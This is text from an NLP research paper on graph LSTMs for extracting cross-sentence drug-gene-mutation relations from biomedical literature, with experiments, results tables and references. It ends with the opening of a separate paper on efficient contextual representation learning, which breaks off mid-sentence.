2008; Peng and Dredze, 2016). By learning contextual entity representations, our frame- work makes it straightforward to conduct multi-task learning. The only change is to add a separate classi- fier for each related auxiliary relation. All classifiers share the same graph LSTMs representation learner and word embeddings, and can potentially help each other by pooling their supervision signals. In the molecular tumor board domain, we applied this paradigm to joint learning of both the ternary rela- tion (drug-gene-mutation) and its binary sub-relation (drug-mutation). Experiment results show that this provides significant gains in both tasks. 4 Implementation Details We implemented our methods using the Theano li- brary (Theano Development Team, 2016). We used logistic regression for our relation classifiers. Hyper parameters were set based on preliminary experi- ments on a small development dataset. Training was done using mini-batched stochastic gradient descent (SGD) with batch size 8. We used a learning rate of 0.02 and trained for at most 30 epochs, with early stopping based on development data (Caruana et al., 2001; Graves et al., 2013). The dimension for the hidden vectors in LSTM units was set to 150, and the dimension for the edge-type embedding was set to 3. The word embeddings were initialized with the pub- licly available 100-dimensional GloVe word vectors trained on 6 billion words from Wikipedia and web text3 (Pennington et al., 2014). Other model param- eters were initialized with random samples drawn uniformly from the range [−1,1]. In multi-task training, we alternated among all tasks, each time passing through all data for one task4, and updating the parameters accordingly. This was repeated for 30 epochs. 3http://nlp.stanford.edu/projects/glove/ 4However, drug-gene pairs have much more data, so we sub- sampled the instances down to the same size as the main n-ary relation task. 106 5 Domain: Molecular Tumor Boards Our main experiments focus on extracting ternary interactions over drugs, genes and mutations, which is important for molecular tumor boards. A drug- gene-mutation interaction is broadly construed as an association between the drug efficacy and the muta- tion in the given gene. There is no annotated dataset for this problem. However, due to the importance of such knowledge, oncologists have been painstakingly curating known relations from reading papers. Such a manual approach cannot keep up with the rapid growth of the research literature, and the coverage is generally sparse and not up to date. However, the cu- rated knowledge can be used for distant supervision. 5.1 Datasets We obtained biomedical literature from PubMed Cen- tral5, consisting of approximately one million full- text articles as of 2015. Note that only a fraction of papers contain knowledge about drug-gene-mutation interactions. Extracting such knowledge from the vast body of biomedical papers is exactly the chal- lenge. As we will see in later subsections, distant supervision enables us to generate a sizable train- ing set from a small number of manually curated facts, and the learned model was able to extract or- ders of magnitude more facts. In future work, we will explore incorporating more known facts for dis- tant supervision and extracting from more full-text articles. We conducted tokenization, part-of-speech tag- ging, and syntactic parsing using SPLAT (Quirk et al., 2012), and obtained Stanford dependencies (de Marneffe et al., 2006) using Stanford CoreNLP (Man- ning et al., 2014). We used the entity taggers from Literome (Poon et al., 2014) to identify drug, gene and mutation mentions. We used the Gene Drug Knowledge Database (GDKD) (Dienstmann et al., 2015) and the Clini- cal Interpretations of Variants In Cancer (CIVIC) knowledge base6 for distant supervision. The knowl- edge bases distinguish fine-grained interaction types, which we do not use in this paper. 5http://www.ncbi.nlm.nih.gov/pmc/ 6http://civic.genome.wustl.edu 5.2 Distant Supervision After identifying drug, gene and mutation mentions in the text, co-occurring triples with known interac- tions were chosen as positive examples. However, unlike the single-sentence setting in standard dis- tant supervision, care must be taken in selecting the candidates. Since the triples can reside in differ- ent sentences, an unrestricted selection of text spans would risk introducing many obviously wrong ex- amples. We thus followed Quirk and Poon (2017) in restricting the candidates to those occurring in a minimal span, i.e., we retain a candidate only if is no other co-occurrence of the same entities in an overlapping text span with a smaller number of con- secutive sentences. Furthermore, we avoid picking unlikely candidates where the triples are far apart in the document. Specifically, we considered en- tity triples within K consecutive sentences, ignoring paragraph boundaries. K = 1 corresponds to the baseline of extraction within single sentences. We explored K ≤ 3, which captured a large fraction of candidates without introducing many unlikely ones. Only 59 distinct drug-gene-mutation triples from the knowledge bases were matched in the text. Even from such a small set of unique triples, we obtained 3,462 ternary relation instances that can serve as pos- itive examples. For multi-task learning, we also con- sidered drug-gene and drug-mutation sub-relations, which yielded 137,469 drug-gene and 3,192 drug- mutation relation instances as positive examples. We generate negative examples by randomly sam- pling co-occurring entity triples without known inter- actions, subject to the same restrictions above. We sampled the same number as positive examples to obtain a balanced dataset7. 5.3 Automatic Evaluation To compare the various models in our proposed framework, we conducted five-fold cross-validation, treating the positive and negative examples from dis- tant supervision as gold annotation. To avoid train- test contamination, all examples from a document were assigned to the same fold. Since our datasets are balanced by construction, we simply report aver- age test accuracy on held-out folds. Obviously, the 7We will release the dataset at http://hanover.azurewebsites.net. 107 Model Single-Sent. Cross-Sent. Feature-Based 74.7 77.7 CNN 77.5 78.1 BiLSTM 75.3 80.1 Graph LSTM - EMBED 76.5 80.6 Graph LSTM - FULL 77.9 80.7 Table 1: Average test accuracy in five-fold cross- validation for drug-gene-mutation ternary interac- tions. Feature-Based used the best performing model in (Quirk and Poon, 2017) with features derived from shortest paths between all entity pairs. Model Single-Sent. Cross-Sent. Feature-Based 73.9 75.2 CNN 73.0 74.9 BiLSTM 73.9 76.0 BiLSTM-Shortest-Path 70.2 71.7 Tree LSTM 75.9 75.9 Graph LSTM-EMBED 74.3 76.5 Graph LSTM-FULL 75.6 76.7 Table 2: Average test accuracy in five-fold cross- validation for drug-mutation binary relations, with an extra baseline using a BiLSTM on the shortest dependency path (Xu et al., 2015b; Miwa and Bansal, 2016). results could be noisy (e.g., entity triples not known to have an interaction might actually have one), but this evaluation is automatic and can quickly evaluate the impact of various design choices. We evaluated two variants of graph LSTMs: “Graph LSTM-FULL” with full parametrization and “Graph LSTM-EMBED” with edge-type embedding. We compared graph LSTMs with three strong base- line systems: a well-engineered feature-based classi- fier (Quirk and Poon, 2017), a convolutional neural network (CNN) (Zeng et al., 2014; Santos et al., 2015; Wang et al., 2016), and a bi-directional LSTM (BiLSTM). Following Wang et al. (2016), we used in- put attention for the CNN and a input window size of 5. Quirk and Poon (2017) only extracted binary rela- tions. We extended it to ternary relations by deriving features for each entity pair (with added annotation to signify the two entity types), and pooling the features from all pairs. For binary relation extraction, prior syntax-aware approaches are directly applicable. So we also compared with a state-of-the-art tree LSTM system (Miwa and Bansal, 2016) and a BiLSTM on the shortest dependency path between the two entities (BiLSTM-Shortest-Path) (Xu et al., 2015b). Table 1 shows the results for cross-sentence, ternary relation extraction. All neural-network based models outperformed the feature-based classifier, il- lustrating their advantage in handling sparse linguis- tic patterns without requiring intense feature engi- neering. All LSTMs significantly outperformed CNN in the cross-sentence setting, verifying the impor- tance in capturing long-distance dependencies. The two variants of graph LSTMs perform on par with each other, though Graph LSTM-FULL has a small advantage, suggesting that further exploration of parametrization schemes could be beneficial. In particular, the edge-type embedding might improve by pretraining on unlabeled text with syntactic parses. Both graph variants significantly outperformed BiLSTMs (p < 0.05 by McNemar’s chi-square test), though the difference is small. This result is intrigu- ing. In Quirk and Poon (2017), the best system in- corporated syntactic dependencies and outperformed the linear-chain variant (Base) by a large margin. So why didn’t graph LSTMs make an equally substantial gain by modeling syntactic dependencies? One reason is that linear-chain LSTMs can already captured some of the long-distance dependencies available in syntactic parses. BiLSTMs substantially outperformed the feature-based classifier, even with- out explicit modeling of syntactic dependencies. The gain cannot be entirely attributed to word embedding as LSTMs also outperformed CNNs. Another reason is that syntactic parsing is less accurate in the biomedical domain. Parse errors con- fuse the graph LSM learner, limiting the potential for gain. In Section 6, we show supporting evidence in a domain when gold parses are available. We also reported accuracy on instances within single sentences, which exhibited a broadly similar set of trends. Note that single-sentence and cross- sentence accuracies are not directly comparable, as the test sets are different (one subsumes the other). We conducted the same experiments on the binary sub-relation between drug-mutation pairs. Table 2 108 Drug-Gene-Mut. Drug-Mut. BiLSTM 80.1 76.0 +Multi-task 82.4 78.1 Graph LSTM 80.7 76.7 +Multi-task 82.0 78.5 Table 3: Multi-task learning improved accuracy for both BiLSTMs and Graph LSTMs. shows the results, which are similar to the ternary case: Graph LSTM-FULL consistently performed the best for both single sentence and cross-sentence instances. BiLSTMs on the shortest path substan- tially underperformed BiLSTMs or graph LSTMs, losing between 4-5 absolute points in accuracy, which could be attributed to the lower parsing quality in the biomedical domain. Interestingly, the state-of-the-art tree LSTMs (Miwa and Bansal, 2016) also under- performed graph LSTMs, even though they encoded essentially the same linguistic structures (word adja- cency and syntactic dependency). We attributed the gain to the fact that Miwa and Bansal (2016) used separate LSTMs for the linear chain and the depen- dency tree, whereas graph LSTMs learned a single representation for both. To evaluate whether joint learning with sub- relations can help, we conducted multi-task learning using Graph LSTM-FULL to jointly train extractors for both the ternary interaction and the drug-mutation, drug-gene sub-relations. Table 3 shows the results. Multi-task learning resulted in a significant gain for both the ternary interaction and the drug-mutation interaction. Interestingly, the advantage of graph LSTMs over BiLSTMs is reduced with multi-task learning, suggesting that with more supervision sig- nal, even linear-chain LSTMs can learn to capture long-range dependencies that are were made evident by parse features in graph LSTMs. Note that there are many more instances for drug-gene interaction than others, so we only sampled a subset of comparable size. Therefore, we do not evaluate the performance gain for drug-gene interaction, as in practice, one would simply learn from all available data, and the sub-sampled results are not competitive. We included coreference and discourse relations in our document graph. However, we didn’t observe any significant gains, similar to the observation in Single-Sent. Cross-Sent. Candidates 10,873 57,033 p ≥ 0.5 1,408 4,279 p ≥ 0.9 530 1,461 GDKD + CIVIC 59 Table 4: Numbers of unique drug-gene-mutation in- teractions extracted from PubMed Central articles, compared to that from manually curated KBs used in distant supervision. p signifies output probability. Quirk and Poon (2017). We leave further exploration to future work. 5.4 PubMed-Scale Extraction Our ultimate goal is to extract all knowledge from available text. We thus retrained our model using the best system from automatic evaluation (i.e., Graph LSTM-FULL) on all available data. The resulting model was then used to extract relations from all PubMed Central articles. Table 4 shows the number of candidates and ex- tracted interactions. With as little as 59 unique drug- gene-mutation triples from the two databases8, we learned to extract orders of magnitude more unique interactions. The results also highlight the benefit of cross-sentence extraction, which yields 3 to 5 times more relations than single-sentence extraction. Table 5 conducts a similar comparison on unique number of drugs, genes, and mutations. Again, ma- chine reading covers far more unique entities, espe- cially with cross-sentence extraction. 5.5 Manual Evaluation Our automatic evaluations are useful for comparing competing approaches, but may not reflect the true classifier precision as the labels are noisy. Therefore, we randomly sampled extracted relation instances and asked three researchers knowledgeable in pre- cision medicine to evaluate their correctness. For each instance, the annotators were presented with the provenance: sentences with the drug, gene, and mutation highlighted. The annotators determined in 8There are more in the databases, but these are the only ones for which we found matching instances in the text. In future work, we will explore various ways to increase the number, e.g., by matching underspecified drug classes to specific drugs. 109 Drug Gene Mut. GDKD + CIVIC 16 12 41 Single-Sent. (p ≥ 0.9) 68 228 221 Single-Sent. (p ≥ 0.5) 93 597 476 Cross-Sent. (p ≥ 0.9) 103 512 445 Cross-Sent. (p ≥ 0.5) 144 1344 1042 Table 5: Numbers of unique drugs, genes and muta- tions in extraction from PubMed Central articles, in comparison with that in the manually curated Gene Drug Knowledge Database (GDKD) and Clinical In- terpretations of Variants In Cancer (CIVIC) used for distant supervision. p signifies output probability. Entity Relation Precision Error Error Random 17% 36% 47% p ≥ 0.5 64% 7% 29% p ≥ 0.9 75% 1% 24% Table 6: Sample precision of drug-gene-mutation interactions extracted from PubMed Central articles. p signifies output probability. each case whether this instance implied that the given entities were related. Note that evaluation does not attempt to identify whether the relationships are true or replicated in follow-up papers; rather, it focuses on whether the relationships are entailed by the text. We focused our evaluation efforts on the cross- sentence ternary-relation setting. We considered three probability thresholds: 0.9 for a high-precision but potentially low-recall setting, 0.5, and a random sample of all candidates. In each case, 150 instances were selected for a total of 450 annotations. A subset of 150 instances were reviewed by two annotators, and the inter-annotator agreement was 88%. Table 6 shows that the classifier indeed filters out a large portion of potential candidates, with estimated instance accuracy of 64% at the threshold of 0.5, and 75% at 0.9. Interestingly, LSTMs are effective at screening out many entity mention errors, presum- ably because they include broad contextual features. Model Precision Recall F1 Poon et al. (2015) 37.5 29.9 33.2 BiLSTM 37.6 29.4 33.0 Graph LSTM 41.4 30.0 34.8 Graph LSTM (GOLD) 43.3 30.5 35.8 Table 7: GENIA test results on the binary relation of gene regulation. Graph LSTM (GOLD) used gold syntactic parses in the document graph. 6 Domain: Genetic Pathways We also conducted experiments on extracting genetic pathway interactions using the GENIA Event Extrac- tion dataset (Kim et al., 2009). This dataset contains gold syntactic parses for the sentences, which offered a unique opportunity to investigate the impact of syn- tactic analysis on graph LSTMs. It also allowed us to test our framework in supervised learning. The original shared task evaluated on complex, nested events for nine event types, many of which are unary relations (Kim et al., 2009). Following Poon et al. (2015), we focused on gene regulation and reduced it to binary-relation classification for head- to-head comparison. We followed their experimental protocol by sub-sampling negative examples to be about three times of positive examples. Since the dataset is not entirely balanced, we re- ported precision, recall, and F1. We used our best performing graph LSTM from the previous experi- ments. By default, automatic parses were used in the document graphs, whereas in Graph LSTM (GOLD), gold parses were used instead. Table 7 shows the re- sults. Once again, despite the lack of intense feature engineering, linear-chain LSTMs performed on par with the feature-based classifier (Poon et al., 2015). Graph LSTMs exhibited a more commanding advan- tage over linear-chain LSTMs in this domain, sub- stantially outperforming the latter (p < 0.01 by Mc- Nemar’s chi-square test). Most interestingly, graph LSTMs using gold parses significantly outperformed that using automatic parses, suggesting that encoding high-quality analysis is particularly beneficial. 7 Related Work Most work on relation extraction has been applied to binary relations of entities in a single sentence. We first review relevant work on the single-sentence bi- 110 nary relation extraction task, and then review related work on n-ary and cross-sentence relation extraction. Binary relation extraction The traditional feature- based methods rely on carefully designed features to learn good models, and often integrate diverse sources of evidence such as word sequences and syn- tax context (Kambhatla, 2004; GuoDong et al., 2005; Boschee et al., 2005; Suchanek et al., 2006; Chan and Roth, 2010; Nguyen and Grishman, 2014). The kernel-based methods design various subsequence or tree kernels (Mooney and Bunescu, 2005; Bunescu and Mooney, 2005; Qian et al., 2008) to capture struc- tured information. Recently, models based on neural networks have advanced the state of the art by auto- matically learning powerful feature representations (Xu et al., 2015a; Zhang et al., 2015; Santos et al., 2015; Xu et al., 2015b; Xu et al., 2016). Most neural architectures resemble Figure 2, where there is a core representation learner (blue) that takes word embeddings as input and produces contextual entity representations. Such representa- tions are then taken by relation classifiers to pro- duce the final predictions. Effectively representing sequences of words, both convolutional (Zeng et al., 2014; Wang et al., 2016; Santos et al., 2015) and RNN-based architectures (Zhang et al., 2015; Socher et al., 2012; Cai et al., 2016) have been successful. Most of these have focused on modeling either the surface word sequences or the hierarchical syntac- tic structure. Miwa and Bansal (2016) proposed an architecture that benefits from both types of informa- tion, using a surface sequence layer, followed by a dependency-tree sequence layer. N-ary relation extraction Early work on extract- ing relations between more than two arguments has been done in MUC-7, with a focus on fact/event extraction from news articles (Chinchor, 1998). Se- mantic role labeling in the Propbank (Palmer et al., 2005) or FrameNet (Baker et al., 1998) style are also instances of n-ary relation extraction, with extrac- tion of events expressed in a single sentence. Mc- Donald et al. (2005) extract n-ary relations in a bio- medical domain, by first factoring the n-ary relation into pair-wise relations between all entity pairs, and then constructing maximal cliques of related enti- ties. Recently, neural models have been applied to semantic role labeling (FitzGerald et al., 2015; Roth and Lapata, 2016). These works learned neural rep- resentations by effectively decomposing the n-ary relation into binary relations between the predicate and each argument, by embedding the dependency path between each pair, or by combining features of the two using a feed-forward network. Although some re-ranking or joint inference models have been employed, the representations of the individual argu- ments do not influence each other. In contrast, we propose a neural architecture that jointly represents n entity mentions, taking into account long-distance dependencies and inter-sentential information. Cross-sentence relation extraction Several rela- tion extraction tasks have benefited from cross- sentence extraction, including MUC fact and event extraction (Swampillai and Stevenson, 2011), record extraction from web pages (Wick et al., 2006), extrac- tion of facts for biomedical domains (Yoshikawa et al., 2011), and extensions of semantic role labeling to cover implicit inter-sentential arguments (Gerber and Chai, 2010). These prior works have either relied on explicit co-reference annotation, or on the assump- tion that the whole document refers to a single co- herent event, to simplify the problem and reduce the need for powerful representations of multi-sentential contexts of entity mentions. Recently, cross-sentence relation extraction models have been learned with distant supervision, and used integrated contextual evidence of diverse types without reliance on these assumptions (Quirk and Poon, 2017), but that work focused on binary relations only and explicitly engi- neered sparse indicator features. Relation extraction using distant supervision Distant supervision has been applied to extraction of binary (Mintz et al., 2009; Poon et al., 2015) and n-ary (Reschke et al., 2014; Li et al., 2015) relations, traditionally using hand-engineered features. Neural architectures have recently been applied to distantly supervised extraction of binary relations (Zeng et al., 2015). Our work is the first to propose a neural archi- tecture for n-ary relation extraction, where the repre- sentation of a tuple of entities is not decomposable into independent representations of the individual entities or entity pairs, and which integrates diverse information from multi-sentential context. To utilize training data more effectively, we show how multi- task learning for component binary sub-relations can 111 improve performance. Our learned representation combines information sources within a single sen- tence in a more integrated and generalizable fashion than prior approaches, and can also improve perfor- mance on single-sentence binary relation extraction. 8 Conclusion We explore a general framework for cross-sentence n- ary relation extraction based on graph LSTMs. The graph formulation subsumes linear-chain and tree LSTMs and makes it easy to incorporate rich linguis- tic analysis. Experiments on biomedical domains showed that extraction beyond the sentence bound- ary produced far more knowledge, and encoding rich linguistic knowledge provided consistent gain. While there is much room to improve in both recall and precision, our results indicate that machine read- ing can already be useful in precision medicine. In particular, automatically extracted facts (Section 5.4) can serve as candidates for manual curation. Instead of scanning millions of articles to curate from scratch, human curators would just quickly vet thousands of extractions. The errors identified by curators offer direct supervision to the machine reading system for continuous improvement. Therefore, the most im- portant goal is to attain high recall and reasonable precision. Our current models are already quite capa- ble. Future directions include: interactive learning with user feedback; improving discourse modeling in graph LSTMs; exploring other backpropagation strategies; joint learning with entity linking; applica- tions to other domains. Acknowledgements We thank Daniel Fried and Ming-Wei Chang for use- ful discussions, as well as the anonymous reviewers and editor-in-chief Mark Johnson for their helpful comments. References Collin Baker, Charles Fillmore, and John Lowe. 1998. The Berkeley FrameNet project. In Proceedings of the Thirty-Sixth Annual Meeting of the Association for Computational Linguistics and Seventeenth Interna- tional Conference on Computational Linguistics. Dane Bell, Gustave Hahn-Powell, Marco A. Valenzuela- Escarcega, and Mihai Surdeanu. 2016. An investi- gation of coreference phenomena in the biomedical domain. In Proceedings of the Tenth Edition of the Language Resources and Evaluation Conference. Yoshua Bengio, Patrice Simard, and Paolo Frasconi. 1994. Learning long-term dependencies with gradient descent is difficult. IEEE transactions on neural networks, 5(2). Elizabeth Boschee, Ralph Weischedel, and Alex Zama- nian. 2005. Automatic information extraction. In Proceedings of the International Conference on Intelli- gence Analysis. Razvan C Bunescu and Raymond J Mooney. 2005. A shortest path dependency kernel for relation extraction. In Proceedings of the Conference on Empirical Meth- ods in Natural Language Processing. Rui Cai, Xiaodong Zhang, and Houfeng Wang. 2016. Bidirectional recurrent convolutional neural network for relation classification. In Proceedings of the Fifty- Fourth Annual Meeting of the Association for Compu- tational Linguistics. Rich Caruana, Steve Lawrence, and Lee Giles. 2001. Overfitting in neural nets: Backpropagation, conjugate gradient, and early stopping. In Proceedings of The Fifteenth Annual Conference on Neural Information Processing Systems. Rich Caruana. 1998. Multitask learning. In Learning to learn. Springer. Yee Seng Chan and Dan Roth. 2010. Exploiting back- ground knowledge for relation extraction. In Proceed- ings of the Twenty-Third International Conference on Computational Linguistics. Nancy Chinchor. 1998. Overview of MUC-7/MET-2. Technical report, Science Applications International Corporation, San Diego, CA. Ronan Collobert and Jason Weston. 2008. A unified ar- chitecture for natural language processing: Deep neural networks with multitask learning. In Proceedings of the Twenty-Fifth International Conference on Machine learning. Mark Craven and Johan Kumlien. 1999. Constructing biological knowledge bases by extracting information from text sources. In Proceedings of the Seventh Inter- national Conference on Intelligent Systems for Molecu- lar Biology. Marie-Catherine de Marneffe, Bill MacCartney, and Christopher D. Manning. 2006. Generating typed dependency parses from phrase structure parses. In Proceedings of the Fifth International Conference on Language Resources and Evaluation. Rodrigo Dienstmann, In Sock Jang, Brian Bot, Stephen Friend, and Justin Guinney. 2015. Database of ge- nomic biomarkers for cancer drugs and clinical tar- getability in solid tumors. Cancer Discovery, 5. 112 Nicholas FitzGerald, Oscar Täckström, Kuzman Ganchev, and Dipanjan Das. 2015. Semantic role labeling with neural network factors. In Proceedings of the Con- ference on Empirical Methods in Natural Language Processing. Matthew Gerber and Joyce Y. Chai. 2010. Beyond Nom- Bank: A study of implicit arguments for nominal predi- cates. In Proceedings of the Forty-Eighth Annual Meet- ing of the Association for Computational Linguistics. Alan Graves, Abdel-rahman Mohamed, and Geoffrey Hin- ton. 2013. Speech recognition with deep recurrent neural networks. In Proceedings of The Thirty-Eighth IEEE International Conference on Acoustics, Speech and Signal Processing. Zhou GuoDong, Su Jian, Zhang Jie, and Zhang Min. 2005. Exploring various knowledge in relation extraction. In Proceedings of the Forty-Third Annual Meeting of the Association for Computational Linguistics. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural computation, 9(8). Nanda Kambhatla. 2004. Combining lexical, syntactic, and semantic features with maximum entropy models for extracting relations. In Proceedings of the Forty- Second Annual Meeting of the Association for Compu- tational Linguistics, Demonstration Sessions. Jin-Dong Kim, Tomoko Ohta, Sampo Pyysalo, Yoshi- nobu Kano, and Jun’ichi Tsujii. 2009. Overview of BioNLP’09 shared task on event extraction. In Proceed- ings of the Workshop on Current Trends in Biomedical Natural Language Processing: Shared Task. Heeyoung Lee, Angel Chang, Yves Peirsman, Nathanael Chambers, Mihai Surdeanu, and Dan Jurafsky. 2013. Deterministic coreference resolution based on entity- centric, precision-ranked rules. Computational Linguis- tics, 39(4). Hong Li, Sebastian Krause, Feiyu Xu, Andrea Moro, Hans Uszkoreit, and Roberto Navigli. 2015. Improvement of n-ary relation extraction by adding lexical semantics to distant-supervision rule learning. In Proceedings of the Seventh International Conference on Agents and Artificial Intelligence. Yujia Li, Daniel Tarlow, Marc Brockschmidt, and Richard Zemel. 2016. Gated graph sequence neural networks. In Proceedings of the Fourth International Conference on Learning Representations. Xiaodan Liang, Xiaohui Shen, Jiashi Feng, Liang Lin, and Shuicheng Yan. 2016. Semantic object parsing with graph LSTM. In Proceedings of European Conference on Computer Vision. Christopher D. Manning, Mihai Surdeanu, John Bauer, Jenny Finkel, Steven J. Bethard, and David McClosky. 2014. The Stanford CoreNLP natural language pro- cessing toolkit. In Proceedings of the Fifty-Second Annual Meeting of the Association for Computational Linguistics: System Demonstrations. Ryan McDonald, Fernando Pereira, Seth Kulick, Scott Winters, Yang Jin, and Pete White. 2005. Simple algo- rithms for complex relation extraction with applications to biomedical IE. In Proceedings of the Forty-Third Annual Meeting on Association for Computational Lin- guistics. Mike Mintz, Steven Bills, Rion Snow, and Dan Juraf- sky. 2009. Distant supervision for relation extraction without labeled data. In Proceedings of the Joint Con- ference of the Forty-Seventh Annual Meeting of the As- sociation for Computational Linguistics and the Fourth International Joint Conference on Natural Language Processing. Makoto Miwa and Mohit Bansal. 2016. End-to-end re- lation extraction using LSTMs on sequences and tree structures. In Proceedings of the Fifty-Fourth Annual Meeting of the Association for Computational Linguis- tics. Raymond J Mooney and Razvan C Bunescu. 2005. Subse- quence kernels for relation extraction. In Proceedings of The Nineteen Annual Conference on Neural Informa- tion Processing Systems. Thien Huu Nguyen and Ralph Grishman. 2014. Employ- ing word representations and regularization for domain adaptation of relation extraction. In Proceedings of the Fifty-Second Annual Meeting of the Association for Computational Linguistics. Martha Palmer, Daniel Gildea, and Paul Kingsbury. 2005. The Proposition Bank: An annotated corpus of seman- tic roles. Computational Linguistics, 31(1). Razvan Pascanu, Tomas Mikolov, and Yoshua Bengio. 2013. On the difficulty of training recurrent neural networks. In Proceedings of The Thirtieth International Conference on Machine Learning. Nanyun Peng and Mark Dredze. 2016. Improving named entity recognition for chinese social media with word segmentation representation learning. In Proceedings of the Fifty-Fourth Annual Meeting of the Association for Computational Linguistics. Jeffrey Pennington, Richard Socher, and Christopher D. Manning. 2014. GloVe: Global vectors for word repre- sentation. In Proceedings of the Conference on Empiri- cal Methods in Natural Language Processing. Hoifung Poon, Chris Quirk, Charlie DeZiel, and David Heckerman. 2014. Literome: PubMed-scale genomic knowledge base in the cloud. Bioinformatics, 30(19). Hoifung Poon, Kristina Toutanova, and Chris Quirk. 2015. Distant supervision for cancer pathway extraction from text. In Pacific Symposium on Biocomputing. Longhua Qian, Guodong Zhou, Fang Kong, Qiaoming Zhu, and Peide Qian. 2008. Exploiting constituent 113 dependencies for tree kernel-based semantic relation extraction. In Proceedings of the Twenty-Second Inter- national Conference on Computational Linguistics. Chris Quirk and Hoifung Poon. 2017. Distant supervi- sion for relation extraction beyond the sentence bound- ary. In Proceedings of the Fifteenth Conference on European chapter of the Association for Computational Linguistics. Chris Quirk, Pallavi Choudhury, Jianfeng Gao, Hisami Suzuki, Kristina Toutanova, Michael Gamon, Wen-tau Yih, and Lucy Vanderwende. 2012. MSR SPLAT, a language analysis toolkit. In Proceedings of the Confer- ence of the North American Chapter of the Association for Computational Linguistics: Human Language Tech- nologies, Demonstration Session. Kevin Reschke, Martin Jankowiak, Mihai Surdeanu, Christopher D Manning, and Daniel Jurafsky. 2014. Event extraction using distant supervision. In Proceed- ings of Eighth edition of the Language Resources and Evaluation Conference. Michael Roth and Mirella Lapata. 2016. Neural semantic role labeling with dependency path embeddings. In Proceedings of the Fifty-Fourth Annual Meeting of the Association for Computational Linguistics. Cicero Nogueira dos Santos, Bing Xiang, and Bowen Zhou. 2015. Classifying relations by ranking with convolutional neural networks. In Proceedings of the Fifty-Third Annual Meeting of the Association for Com- putational Linguistics. Franco Scarselli, Marco Gori, Ah Chung Tsoi, Markus Hagenbuchner, and Gabriele Monfardini. 2009. The graph neural network model. IEEE Transactions on Neural Networks, 20(1). Richard Socher, Brody Huval, Christopher D Manning, and Andrew Y Ng. 2012. Semantic compositionality through recursive matrix-vector spaces. In Proceedings of the Joint Conference on Empirical Methods in Natu- ral Language Processing and Computational Natural Language Learning. Fabian M Suchanek, Georgiana Ifrim, and Gerhard Weikum. 2006. Combining linguistic and statistical analysis to extract relations from web documents. In Proceedings of the Twelfth International Conference on Knowledge Discovery and Data Mining. Mihai Surdeanu and Ji Heng. 2014. Overview of the english slot filling track at the TAC2014 knowledge base population evaluation. In Proceedings of the U.S. National Institute of Standards and Technology Knowl- edge Base Population 2014 Workshop. Kumutha Swampillai and Mark Stevenson. 2011. Extract- ing relations within and across sentences. In Proceed- ings of the Conference on Recent Advances in Natural Language Processing. Kai Sheng Tai, Richard Socher, and Christopher D Man- ning. 2015. Improved semantic representations from tree-structured long short-term memory networks. In Proceedings of the Fifty-Third Annual Meeting of the Association for Computational Linguistics. Theano Development Team. 2016. Theano: A Python framework for fast computation of mathematical ex- pressions. arXiv e-prints, abs/1605.02688. Linlin Wang, Zhu Cao, Gerard de Melo, and Zhiyuan Liu. 2016. Relation classification via multi-level attention CNNs. In Proceedings of the Fifty-Fourth Annual Meet- ing of the Association for Computational Linguistics. Michael Wick, Aron Culotta, and Andrew McCallum. 2006. Learning field compatibilities to extract database records from unstructured text. In Proceedings of the Conference on Empirical Methods in Natural Language Processing. Kun Xu, Yansong Feng, Songfang Huang, and Dongyan Zhao. 2015a. Semantic relation classification via convolutional neural networks with simple negative sampling. In Proceedings of Conference on Empirical Methods in Natural Language Processing. Yan Xu, Lili Mou, Ge Li, Yunchuan Chen, Hao Peng, and Zhi Jin. 2015b. Classifying relations via long short term memory networks along shortest dependency paths. In Proceedings of Conference on Empirical Methods in Natural Language Processing. Yan Xu, Ran Jia, Lili Mou, Ge Li, Yunchuan Chen, Yangyang Lu, and Zhi Jin. 2016. Improved relation classification by deep recurrent neural networks with data augmentation. In Proceedings of the Twenty-Sixth International Conference on Computational Linguis- tics. Nianwen Xue, Hwee Tou Ng, Sameer Pradhan, Rashmi Prasad, Christopher Bryant, and Attapol Rutherford. 2015. The CoNLL-2015 shared task on shallow dis- course parsing. In Proceedings of the Conference on Computational Natural Language Learning, Shared Task. Katsumasa Yoshikawa, Sebastian Riedel, Tsutomu Hi- rao, Masayuki Asahara, and Yuji Matsumoto. 2011. Coreference based event-argument relation extraction on biomedical text. Journal of Biomedical Semantics, 2(5). Daojian Zeng, Kang Liu, Siwei Lai, Guangyou Zhou, Jun Zhao, et al. 2014. Relation classification via convo- lutional deep neural network. In Proceedings of the Twenty-Sixth International Conference on Computa- tional Linguistics. Daojian Zeng, Kang Liu, Yubo Chen, and Jun Zhao. 2015. Distant supervision for relation extraction via piecewise convolutional neural networks. In Proceedings of the Conference on Empirical Methods in Natural Language Processing. 114 Shu Zhang, Dequan Zheng, Xinchen Hu, and Ming Yang. 2015. Bidirectional long short-term memory networks for relation classification. In Proceedings of Twenty- Ninth Pacific Asia Conference on Language, Informa- tion and Computation. 115 116 work_47lp4am6gndwhjbxhphpyiw2zy ---- Efficient Contextual Representation Learning With Continuous Outputs Liunian Harold Li†, Patrick H. Chen∗, Cho-Jui Hsieh∗, Kai-Wei Chang∗ †Peking University ∗University of California, Los Angeles liliunian@pku.edu.cn, patrickchen@g.ucla.edu {chohsieh, kwchang}@cs.ucla.edu Abstract Contextual representation models have achieved great success in improving various downstream natural language processing tasks. However, these language-model-based encoders are dif- ficult to train due to their large parameter size and high computational complexity. By carefully examining the training procedure, we observe that the softmax layer, which pre- dicts a distribution of the target word, often in- duces significant overhead, especially when the vocabulary size is large. Therefore, we re- visit the design of the output layer and consider directly predicting the pre-trained embedding of the target word for a given context. When applied to ELMo, the proposed approach achieves a 4-fold speedup and eliminates 80% trainable parameters while achieving competitive per- formance on downstream tasks. Further anal- ysis shows that the approach maintains the speed advantage under various settings, even when the sentence encoder is scaled up. 1 Introduction In recent years, text representation learning ap- proaches, such as ELMo (Peters et al., 2018a), GPT (Radford et al., 2018), BERT (Devlin et al., 2019), and GPT-2 (Radford et al., 2019), have been developed to represent generic contextual information in natural languages by training an encoder with a language model objective on a large unlabelled corpus. During the training process, the encoder is given part of the text and asked to predict the missing pieces. Prior studies show that the encoders trained in this way can capture generic contextual information of the input text and improve a variety of downstream tasks significantly. However, training contextual representations is known to be a resource-hungry process. For example, ELMo is reported to take about 2 weeks to train on a one-billion-token corpus with a vocabulary of 800,000 words using three GPUs.1 This slow training procedure hinders the development cycle, prevents fine-grained param- eter tuning, and makes training contextual repre- sentations inaccessible to the broader community. Recent work also raises concerns about the envi- ronmental implications of training such large models (Strubell et al., 2019). In addition, the suc- cess of these models stems from a large amount of data they used. It is challenging, if not impossible, to train a contextual representation model on a 